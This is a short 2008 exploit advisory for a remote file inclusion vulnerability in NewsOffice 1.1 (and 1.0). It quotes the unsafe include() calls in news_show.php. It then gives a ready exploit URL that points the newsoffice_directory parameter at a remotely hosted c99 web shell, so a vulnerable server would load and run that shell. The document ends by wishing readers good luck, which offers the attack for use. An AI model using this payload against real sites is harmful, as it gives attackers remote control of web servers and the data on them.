NewsOffice 1.1 Remote File Inclusion Vulnerability

2008-04-11
ID: 2867
CVE: None
Download vulnerable application: None
# Name : NewsOffice 1.1 Remote File Include Vulnerabilitiy

# Download From : http://www.newanz.com/applications/NewsOffice/?page=download          

+======================================================================================================================+

# Vulne Code In File news_show.php In Different Lines :

include($newsoffice_directory."config.php");
include($newsoffice_directory."news_data.php");
include($newsoffice_directory."template.php");

# Exploit :

http://WwW.4RxH.CoM/NewsOffice/news_show.php?newsoffice_directory=http://rxh.freehostia.com/shells/c99in.txt?

Also The Version 1.0 Is Infected In Same File

That,s It,s

Good Luck Everybody

+=======================================================================================================================+


1-4-2 (www01)